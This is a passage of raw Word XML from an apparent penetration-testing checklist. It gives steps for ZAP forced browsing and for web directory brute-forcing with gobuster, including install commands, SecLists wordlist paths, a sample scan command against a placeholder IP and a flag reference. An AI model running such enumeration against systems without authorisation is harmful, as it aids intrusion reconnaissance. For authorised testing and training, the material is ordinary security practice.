            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="C5E0B3" w:themeFill="accent6" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="643E0E5B" w14:textId="67DFF8A5" w:rsidR="00DC2A77" w:rsidRDefault="00DC2A77" w:rsidP="00393059">
            <w:r>
              <w:t>4</w:t>
            </w:r>
            <w:r w:rsidR="003C01E2">
              <w:t>8</w:t>
            </w:r>
            <w:r>
              <w:t>.e</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2397" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E2EFD9" w:themeFill="accent6" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="3BB9B6B7" w14:textId="77777777" w:rsidR="00DC2A77" w:rsidRDefault="00DC2A77" w:rsidP="00393059">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8019" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="5EA35568" w14:textId="302A7A96" w:rsidR="00DC2A77" w:rsidRDefault="00DC2A77" w:rsidP="00393059">
            <w:r>
              <w:t>Now, when rescanning the target URL, a lot more should be able to be picked up when the cookie session ID is selected as ‘active’.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DC2A77" w14:paraId="21C3CA80" w14:textId="77777777" w:rsidTr="00393059">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="C5E0B3" w:themeFill="accent6" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="1E527372" w14:textId="027165D3" w:rsidR="00DC2A77" w:rsidRDefault="00DC2A77" w:rsidP="00393059">
            <w:r>
              <w:t>4</w:t>
            </w:r>
            <w:r w:rsidR="003C01E2">
              <w:t>8</w:t>
            </w:r>
            <w:r>
              <w:t>.f</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2397" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E2EFD9" w:themeFill="accent6" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="5C23AE4F" w14:textId="77777777" w:rsidR="00DC2A77" w:rsidRDefault="00DC2A77" w:rsidP="00393059">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8019" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="5FE2FAFE" w14:textId="07331D4F" w:rsidR="00DC2A77" w:rsidRPr="00FB144A" w:rsidRDefault="00DC2A77" w:rsidP="00393059">
            <w:r>
              <w:t xml:space="preserve">To use a dictionary attack, navigate through </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>‘Tools’ &gt; ‘Options’ &gt; ‘Forced Browse’</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> and then add any wordlists that you would like to and then select the one you want via the ‘default wordlist’ drop down menu. You can also select to search for files also.</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t xml:space="preserve">Then in the left pane, under ‘Sites’, right click the URL you wish to brute force and select </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>‘Attack’ &gt; ‘Forced Browse Site’</w:t>
            </w:r>
            <w:r>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DC2A77" w14:paraId="048221E7" w14:textId="77777777" w:rsidTr="00393059">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="C5E0B3" w:themeFill="accent6" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="5FCAE5CB" w14:textId="0B72605B" w:rsidR="00DC2A77" w:rsidRDefault="00DC2A77" w:rsidP="00393059">
            <w:r>
              <w:t>4</w:t>
            </w:r>
            <w:r w:rsidR="003C01E2">
              <w:t>8</w:t>
            </w:r>
            <w:r>
              <w:t>.g</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2397" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E2EFD9" w:themeFill="accent6" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="05DE93E3" w14:textId="77777777" w:rsidR="00DC2A77" w:rsidRDefault="00DC2A77" w:rsidP="00393059">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8019" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="46DC1799" w14:textId="4843520A" w:rsidR="00DC2A77" w:rsidRDefault="00DC2A77" w:rsidP="00393059">
            <w:r>
              <w:t>Within the ‘Sites’ tab on the left pane, click to reveal the folders inside the target URL and scroll down to find a ‘vulnerabilities’ folder</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003A4077" w14:paraId="4FB11D54" w14:textId="77777777" w:rsidTr="00393059">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="C5E0B3" w:themeFill="accent6" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="65146D4D" w14:textId="77777777" w:rsidR="003A4077" w:rsidRDefault="003A4077" w:rsidP="00393059"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2397" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E2EFD9" w:themeFill="accent6" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="5BB202E1" w14:textId="77777777" w:rsidR="003A4077" w:rsidRDefault="003A4077" w:rsidP="00393059">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8019" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="57255EC2" w14:textId="77777777" w:rsidR="003A4077" w:rsidRPr="000C65EE" w:rsidRDefault="003A4077" w:rsidP="00393059"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0E87E2FA" w14:textId="425A1400" w:rsidR="008B4947" w:rsidRDefault="00B17246">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:tblpY="814"/>
        <w:tblW w:w="11027" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="611"/>
        <w:gridCol w:w="2389"/>
        <w:gridCol w:w="8027"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D5731C" w14:paraId="24B9E6D8" w14:textId="77777777" w:rsidTr="000B7A8A">
        <w:trPr>
          <w:trHeight w:val="1075"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="BDD6EE" w:themeFill="accent5" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="1BCC215B" w14:textId="6BF2C29E" w:rsidR="00D5731C" w:rsidRDefault="003A4077" w:rsidP="00EC2BE0">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>4</w:t>
            </w:r>
            <w:r w:rsidR="003C01E2">
              <w:t>9</w:t>
            </w:r>
            <w:r w:rsidR="00D5731C">
              <w:t>.a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2389" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6" w:themeFill="accent5" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="01286B4A" w14:textId="195B2DC3" w:rsidR="00D5731C" w:rsidRDefault="00D5731C" w:rsidP="00EC2BE0">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>gobuster</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>(Remember, gobuster is not installed by default on Kali)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8027" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0E63C8EE" w14:textId="59C14C26" w:rsidR="00D5731C" w:rsidRPr="00633014" w:rsidRDefault="00D5731C" w:rsidP="00EC2BE0">
            <w:pPr>
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00633014">
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
              <w:t>IF THERE IS A WEBSITE ASSOCIATED WITH THE IP ADDRESS. OTHERWISE, SKIP.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="748EC8CA" w14:textId="6CDA4FBD" w:rsidR="00D5731C" w:rsidRPr="00EC2BE0" w:rsidRDefault="00D5731C" w:rsidP="00EC2BE0">
            <w:r w:rsidRPr="00B51381">
              <w:t>First,</w:t>
            </w:r>
            <w:r w:rsidR="006842C5">
              <w:t xml:space="preserve"> ensure</w:t>
            </w:r>
            <w:r w:rsidRPr="00B51381">
              <w:t xml:space="preserve"> Gobuster</w:t>
            </w:r>
            <w:r w:rsidR="006842C5">
              <w:t xml:space="preserve"> is installed with one simple command in Kali</w:t>
            </w:r>
            <w:r w:rsidRPr="00B51381">
              <w:t>:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00B51381">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t xml:space="preserve"> sudo</w:t>
            </w:r>
            <w:r w:rsidRPr="00B51381">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> apt-get </w:t>
            </w:r>
            <w:r w:rsidRPr="00B51381">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">install </w:t>
            </w:r>
            <w:r w:rsidRPr="00B51381">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>gobuster</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000B7A8A" w14:paraId="5657FFDD" w14:textId="77777777" w:rsidTr="000B7A8A">
        <w:trPr>
          <w:trHeight w:val="988"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="C5E0B3" w:themeFill="accent6" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="6D2EB7F4" w14:textId="2035C513" w:rsidR="000B7A8A" w:rsidRDefault="000B7A8A" w:rsidP="00EC2BE0">
            <w:r>
              <w:t>49.b</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2389" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E2EFD9" w:themeFill="accent6" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="3453EA80" w14:textId="034564A2" w:rsidR="000B7A8A" w:rsidRDefault="000B7A8A" w:rsidP="00EC2BE0">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>gobuster</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8027" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="1ACD81E2" w14:textId="77777777" w:rsidR="000B7A8A" w:rsidRDefault="000B7A8A" w:rsidP="00EC2BE0">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="00B050"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D5731C">
              <w:t>Remember, you need to supply gobuster with a wordlist for it to be able to take these words and search for them to be present or not in the target web server.</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00472B43">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>/usr/share/seclists/Discovery/Web-Content</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00472B43">
              <w:t>e.g.</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00472B43">
              <w:t xml:space="preserve"> ... </w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00472B43">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>/usr/share/seclists/Discovery/Web-Content/</w:t>
            </w:r>
            <w:r w:rsidRPr="00472B43">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>common.txt</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>/usr/share/wordlists/dirb/</w:t>
            </w:r>
            <w:r w:rsidRPr="000C302E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>common.txt</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2DE741D1" w14:textId="4AA2F5D8" w:rsidR="00C17BAB" w:rsidRDefault="00C17BAB" w:rsidP="00C17BAB">
            <w:r w:rsidRPr="00C17BAB">
              <w:t>SecLists can be downloaded using:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="003D1819">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t xml:space="preserve"> sudo</w:t>
            </w:r>
            <w:r w:rsidRPr="003D1819">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> apt-get </w:t>
            </w:r>
            <w:r w:rsidRPr="003D1819">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>update</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="125808D8" w14:textId="1BD4B7FC" w:rsidR="00C17BAB" w:rsidRPr="00633014" w:rsidRDefault="00C17BAB" w:rsidP="00C17BAB">
            <w:pPr>
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00DA768A">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>sudo</w:t>
            </w:r>
            <w:r w:rsidRPr="00DA768A">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> apt</w:t>
            </w:r>
            <w:r w:rsidRPr="00DA768A">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00DA768A">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">install </w:t>
            </w:r>
            <w:r w:rsidRPr="00DA768A">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>seclist</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>s</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000B7A8A" w14:paraId="22AB5DD5" w14:textId="77777777" w:rsidTr="000B7A8A">
        <w:trPr>
          <w:trHeight w:val="1181"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="C5E0B3" w:themeFill="accent6" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="7EFBA246" w14:textId="3770F58E" w:rsidR="000B7A8A" w:rsidRDefault="000B7A8A" w:rsidP="00EC2BE0">
            <w:r>
              <w:t>49.c</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2389" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E2EFD9" w:themeFill="accent6" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="168D4AE2" w14:textId="77777777" w:rsidR="000B7A8A" w:rsidRDefault="000B7A8A" w:rsidP="00EC2BE0">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8027" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="07FBC265" w14:textId="04647B22" w:rsidR="000B7A8A" w:rsidRDefault="000B7A8A" w:rsidP="00EC2BE0">
            <w:r>
              <w:t>Gobuster is used like this:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00CE1D7A">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">gobuster </w:t>
            </w:r>
            <w:r w:rsidRPr="00CE1D7A">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>dir</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00CE1D7A">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">-u </w:t>
            </w:r>
            <w:r w:rsidRPr="00CE1D7A">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve">http://X.X.X.X </w:t>
            </w:r>
            <w:r w:rsidRPr="00CE1D7A">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-w</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00CE1D7A">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>/usr/share/seclists/Discovery/Web-Content/</w:t>
            </w:r>
            <w:r w:rsidRPr="00472B43">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00472B43">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>common.txt</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00CE1D7A">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>dir</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:t>Use directory/file enumeration</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="0027609F">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>dns</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="0027609F">
              <w:t>Use dns subdomain enumeration</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00CE1D7A">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-u</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="0027609F">
              <w:t>T</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE1D7A">
              <w:t xml:space="preserve">arget </w:t>
            </w:r>
            <w:r>
              <w:t>URL</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="0027609F">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-v</w:t>
            </w:r>
            <w:r w:rsidRPr="0027609F">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:t>Verbose output</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00CE1D7A">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-w</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE1D7A">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>Wordlist file</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00CE1D7A">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-x</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>File type search</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00672FAB">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">-t </w:t>
            </w:r>
            <w:r w:rsidRPr="00672FAB">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>#</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>Set number of threads</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00C323A8">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-r</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>Follow redirects</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002F19FA">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-P</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>Set a password</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002F19FA">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-U</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>Set a username</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002F19FA">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-c</w:t>
            </w:r>
            <w:r w:rsidR="00EF7034">
              <w:rPr>
                <w:color w:val="00B0F0"/>
